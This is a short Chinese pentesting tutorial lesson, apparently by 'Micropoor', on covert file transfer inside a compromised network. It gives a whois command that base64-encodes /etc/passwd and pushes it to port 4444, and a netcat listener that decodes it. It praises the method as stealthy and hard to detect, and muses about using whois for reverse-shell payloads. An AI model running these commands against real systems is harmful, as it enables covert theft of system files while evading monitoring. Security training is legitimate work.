# 第五十三课：内网渗透中的文件传输

利用whois传输文件：

传输机：

```bash
root@john:~# whois -h 127.0.0.1 -p 4444 `cat /etc/passwd | base64`
```

接受机：

```bash
root@john:/tmp# nc -l -v -p 4444 | sed "s/ //g" | base64 -d
```

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJx91FtjaJeHPRFtQd%2Fcd6ba6694ef1388b87dc4a5ce706ecd8.jpg?generation=1551060436416619\&alt=media)

![](https://1465213733-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LZJtlFN7NOR8zMCiJsm%2F-LZXOtmCj3pT3_pYH1dV%2F-LZJx91K0e7i98wGF4Dh%2F2ee55e5bed9e117f9340df1f2e755410.jpg?generation=1551060433377967\&alt=media)

**优点：**适用于隐蔽传输。最小化被发现。\
**缺点：**适用于传输小文件。

> 后者的话：whois是否同样适用于payload的反弹，是一个非常有趣的实验。
>
> Micropoor